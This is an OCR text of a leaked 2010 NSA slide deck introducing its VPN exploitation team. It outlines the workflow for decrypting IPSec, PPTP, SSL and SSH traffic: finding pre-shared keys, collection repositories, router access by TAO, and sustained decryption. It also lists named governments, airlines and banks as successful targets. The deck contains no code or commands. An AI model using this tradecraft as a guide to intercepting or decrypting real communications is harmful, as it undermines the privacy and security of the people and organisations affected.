
TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 



Intro to the VPN Exploitation 

Process 



OTP VPN Exploitation Team 

S31176 




September 13, 2010 





TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 




TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 




Overview 




* S31176 and the OTP VPN Exploitation Team 

* How can we help you? 

< VPN and Network Encryption Types 

< Birth of the VPN Adventure 

/ 

< Sustained Exploitation / 

* Exploitation Successes 

< Conclusions ^ y / 
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S31176 

Branch Name: 

Custom Thread Development for 
Network Encryption 




Team Name: V/ 
OTP VPN Exploitation Team 
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Mission Statement 




S31176 provides cryptanalytic support services for many 
network encryption protocols, including, but not limited to: 
IPSec, SSL, PPTP, SSH and proprietary protocols. We are 
the front-door of CES for targeted vulnerability assessment 
and custom interim end-to-end exploitation flows for these 
protocols. In conjunction with various agency SIGDEV 
counterparts and target organizations, we engage in 
discovery to find TOPI targets of interest. By maintaining 
contact with field sites, TAO, and NCSC, we endeavor to 
guide and direct development and access through both 
active and passive means in order to make exploitation 
possible and enable full prosecution of the target... 
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Purpose in a Nutshell 




< Act as your one stop shop for all VPN and 
network encryption exploitation related 
issues! 



■ Act as a liaison for SIGDEVers and TOPIs 
to other areas of the VPN community 

■ Perform some SIGDEV and target 
discovery 
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Where are we positioned? 



SID, S 



^ Data Acquisition, S3 



h Cryptanalytic Exploitation 
Services, S31 



k Office of Target Pursuit, 
_ S311 



' i ** 




L Cryptanalytic Exploitation 
discovery, S3117 



Custom Thread 
Development for 
Network Encryption, 
S31176 
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S31176 Branch Members 



- Collection 

- CMP Intern 

-Team Lead, IPSec, SSH 

- IPSec 

- Branch Chief 

- Diversity Tour 

- CADP Intern 
-PPTP 

- BLEAKINQUIRY, SSL 

How to Contact us (May be changing soon): 
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Branches within OTP 

S31171 - PRC, N Korea, SE Asia, Japan 
S31172 - Iran, Hamas, Iraq, Saudi Arabia 





S31173 -Africa, Levant, Latin America, India, 
Pakistan, Afghanistan 



S31174 - Russia, Counter-Intel, Europe, FTM 
S31175 - Cross-Target Support Branch 
S31176 - Custom Thread Development 
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Exploitation in the OTP Branches 



Each branch has a VPN representative 

We inform them about attacks, they inform us about targets 
If you have a target-specific inquiry, they may be able to help 



S31171 (Eastern and Southeast Asia) 



S31172 (Iran, Iraq, Arabian Peninsula) 



S31173 (Levant, Central Asia, Africa, Latin America) 



S31174 (Russia, Europe, International Targets) 
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How can we help you? 




Provide Exploitation Support 

Provide VPN vulnerability analysis 

Engage Network Security Products, TAO, ESO, etc 

Convey meaningful feedback to customer 

Develop sustained exploitation threads when 
possible 

Suggest alternative approaches if passive 
exploitation is unrealistic 

DECRYPTS, DECRYPTS, DECRYPTS!!!!!! 
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Additional Services 

We can assist with the following: 

Collection problems 
Tasking 
Data flow 
Plaintext analysis 

Metadata interpretation ^ 

" " .. /■ 

Tip-off vulnerable VPN links 
VPN SIGDEV 

Target Discovery and Development 




' i ** 
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Glad you asked! 

Familiarize yourself with appropriate search criteria 



Get a BLEAKINQUIRY account 



If you find VPN-related data, let us know. 

The existence of a VPN on a network of interest 
Configuration/setup information about the VPN 
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BLEAKINQUIRY 




Metadata database of potentially exploitable VPNs 



Data Sources 

TOYGRIPPE metadata testing 
XKEYSCORE fingerprints 
Daily VPN exploitation 

Let us stress... ’’P-O-T-E-N-T-l-A-L” 




Want an account? 

E-mail or 
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-»• I |iuj^ [Google 



-lie Edi: View History Bookmarks _ools Help 

<;^ ^ O il 

g| BLEAKINQUIR^ ] ■» 



BLEAKINQUIRY 



Simple Search | 



Advanced Search Batch Search 








Done 



^ 
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Local IPSec Processing 
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Type 1: IPSec 

IPSec: IP Security 
Complete paired IKE 

Common UDP ports: 500 and 4500 

Pre-Shared Key (PSK) 

Router configuration (good source for PSKs) 

Encrypted Payload (ESP or AH) 

Next Protocol 50 or 51 

XKEYSCORE Queries 

Full log DNI search 

AppID/Fingerprints: “vpn/*”, “vpn/esp”, “vpn/isakmp”, “vpn/ikev2”, 
“vpn/ikev2_content” 
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Type 2: PPTP 

PPTP: Point-to-Point Tunneling Protocol 




Paired collect 

Next Protocol 47 = PPTP payload 

TCP Port 1723 = PPTP tunnel set up, no payload 

One-sided collect, client side 

XKEYSCORE Queries / 

Full log DNI search 

Enter your IPs/casn/etc of interest 

AppI D/Fingerprint: “vpn/pptp_encr*” 

Share your results with 
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Type 3: SSL 

SSL - Secure Sockets Layer 




Renamed TLS (Transport Layer Security) but still often 
referred to as SSL 



Paired collect - Compare IP’s and Ports 
Server Certificates 



Port Numbers: 443, 465, 989, 990, 992, 993, and 
995 

XKEYSCORE Queries 

Full log DNI search or use SSL plugin 

AppID/Fingerprints: “encryption/ssl/*” or 
“network_encryption/ssl/*” 
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Industry-standard networking protocol for securely 
logging into other machines via a network. 



Complete paired traffic 
Port number 22 



Potentially recover user names and passwords 

Useful to TAO to access boxes and gather 
cryptographic information 

XKEYSCORE Queries 

Full log DNI search 
AppID/Fingerprints: “termlnal/ssh/*” 
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Birth of the VPN Adventure 




receive VPN-related requests from across the Globe 



TOPIS 



SIGDEV Analysts 
OTP Analysts 
Cryptologic Centers 
Field Sites 
Second Parties 
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The Many Flavors of Requests 






’Mtes OV 




IP Links & 
Ranges 



SSH 



Fingerprints 



VPN 

Metadata 





VPN 

EXPLOITATION 
TEAM 



Domain 

Names 



BLEAKINQUIRY 




Protocols 




Interesting 
Terms & 
Names 



Vulnerability 

Evaluations 



/ 

/ 

/ ^ 
/ 
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/ 



1. Initial Steps 



VPN Info Found/Question Arises 



Task Assigned to Team Analyst 






Gather Background Info About Request 
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2. Consult Repositories 




BLEAKINQUIRY - Metadata database of potentially exploitable VPNs 



TOYGRIPPE - VPN metadata repository 

PINWALE - Long-term repository for 
tasked SIGINT collect 

XKEYSCORE - Processes and databases DNI 
collect from various field sites 

Full-take feed (tasked and untasked) 

VULCANDEATHGRIP - Repository for 
tasked, full-take VPN collection 

FOURSCORE - PPTP repository 
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3. Scripts: IPSec Focus 




Format downloaded repository files 
Create intermediate processing files 
Check for potential vulnerabilities 
Search for PSKs in CORALREEF 
Run attacks to recover PSK 
Decrypt traffic 
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4. Communicate Results 




Can we decrypt the VPN traffic? 



If the answer is “No” then explain how to 
turn it into a “YES!” 



If the answer is “YES!” then... 




TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 



25 



TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 




YES! We Have Decrypt! 




Notify customer of success 

Send decrypt through post-processing and 
deliver to TOPI 



Have TOPI determine the priority level of the 
resulting plain text 

Get IPs on sustained collect 



Set up and transition sustained decryption 
process to OTP VPN Branch Rep 
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Turn that Frown Upside Down! 
From “No” to “YES!” 




Depends on why we couldn’t decrypt it 

Find Pre-Shared Key 

Locate complete paired collect 

Locate both IKE and ESP traffic 

Have collection sites do surveys for the IP’s 

Find better quality collect with rich metadata 
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Contact Our Friends for 




Network Security Products 
Develop decryption algorithms 
Tailored Access Operations 
Computer Network Exploitation to create access points 



Collection Sites 

Perform surveys for the IPs of interest 
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More Friends 




NSA/CSS Commercial Solutions Center 
Manage industrial relationships 

SIGDEV 



Develops tools and methods to help you find 
the traffic you desire 

OTP VPN Representatives ^ 

Assist in locating traffic of interest / 

TOPI ^ ^ 

Target knowledge 
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Sustained Exploitation 




Develop sustained exploitation thread 
AFTER the TOPI confirms the decrypts are 
interesting 

TOPI must task IP in CADENCE 

Task Port and IP 

UTT does not have boolean logic 
Categories 

IPSec: 6640 (protocols) and 6648 (ports) 

PPTP: 6648 (ports) 

SSL: 6647 (ports) 

Get the crypt system title 

Work with the OTP VPN Regional Branch representative 
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Establish the Data Flow 




Establish the correct corporate data flow 

CES data flow guru | 

Make sure the correct routing tags and categories 
are appended to the data 

Direct tasked traffic to correct data repository 

PINWALE 

VULCANDEATHGRIP - IPSec 
VULCANMINDMELD - SSL 
FOURSCORE - PPTP 

Try to avoid relying on XKS workflows due to legal and 
logistical issues 

XKEYSCORE - SSH using XKS workflows directed to 
a file directory 
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f Data Flow Integrity 

Evaluate data integrity, quality, & quantity 



Different collectors produce different metadata 
formats 

Need rich metadata 




Need all the pieces (IKE and ESP for IPSec) 

Ensure that the data is not garbled and headers 
attached appropriately 

Check that the data volume is what is expected 
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Collection Sites 




Contact Collection Sites if there are data 



issues 

Malformed headers 
Missing metadata 
Missing payload 
Garbled data 
Low volume 
Single-sided traffic 



Collection sites sometimes only collect one- 
side of the VPN traffic 

Need to collaborate with both sites 
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Decrypt Processing 

Decrypt the VPN traffic 
Create SRI files for decrypts 





Send the decrypt and SRI files to 
TURTLEPOWER (IPSec, PPTP) or CAPRI OS (SSL, 
SSH) for post-processing 
Decryption of payload 
Decompression V 

Unrar files ^ 

Route to appropriate data repository according 
to the crypt system title and type of decrypt (text, 
voice, etc) 
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Decrypt Repositories 




PINWALE 

Tasked IPSec, PPTP, and SSL 

Must be placed in the correct partition according to 
classification (REL FVEY, NOFORN, FISA) 



XKEYSCORE 

SSH - often have router configurations and user 
credentials which are easier to view in XKS than 
PINWALE 

Still developing the process 
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TOPI Evaluation 




Analyst locates the decrypts in PINWALE and/or 
XKEYSCORE 



Viewing the decrypts 

PINWALE, 

XKEYSCORE 

AGILITY 

DNI PRESENTER 



Contact TURTLEPOWER or CAPRI OS if there are 
file rendering issues 

Also try the Unidentified Protocols team in s S31122 for 
help identifying unknown protocols 
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Thread Monitoring 




Responsibility for monitoring these 
e>mloitation threads are transferred to the 
OTP VPN Regional Branch representative 
After the thread is established and stabilized 



Trouble shoots decryption and collection 
issues 



Set up a cron job to run the decryptor 
every day 

Hopefully the TOPI continues to identify 
and report mission-critical intelligence from 
these decrypts 
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Success 1: IPSec 




Follow-the-Money and TAO Targets 



TOPI (S2C22) has had a close 
relationship with TAO for quite some time 



FTM Target 1 

Not susceptible to any of NSP’s implants 

TAO got the configuration files which 
provided us the PSKs to enable passive 
exploitation 



TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 



39 



TOP SECRET//COMINT//REL USA, AUS, CAN, GBR, NZL 




Success 1: IPSec 




FTM Target 2 

TAO got on the router through which banking 
traffic of interest flows 



NSP had an implant which allows passive 
exploitation with just ESP 

Successful exploitation for the past two 
years 
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Success 2: PPTP 

Airlines 

Iran Air, IRTAA 

Royal Jordanian Air, JOTAA 

Transaero Airlines, RUCAC 

Telecommunications 





Mir Telematiki (pending system title) 
Afghani Wimax (pending system title) 

Government 

Mexican Diplomatic, MXDBB 
Pakistani General Intelligence, PKRAQ 
Turkish Diplomatic, TUDAT 
Afghanistan Government, AFYAD 
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Success 2: PPTP 

Banking and Financial 



Zaad Financial 




Ewallet transactions of a principal financial node for 
Somali terrorist activity 

Follow-the-Money customer 

Kabul Bank 

BNI Banking, Indonesia 

Formed and owned by the Indonesian government 

Banking transactions over “Flexy,” Telkom 
Indonesia’s fixed wireless network 

Other 

IRGC cyber attacker 

Nigerian power company’s internal network 
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Reminders 




If it’s not exploitable now, that doesn’t mean it 
won’t be later 



We collaborate and communicate with our 
friends to produce decrypts 



Traffic must be both good quality and the 
correct type 
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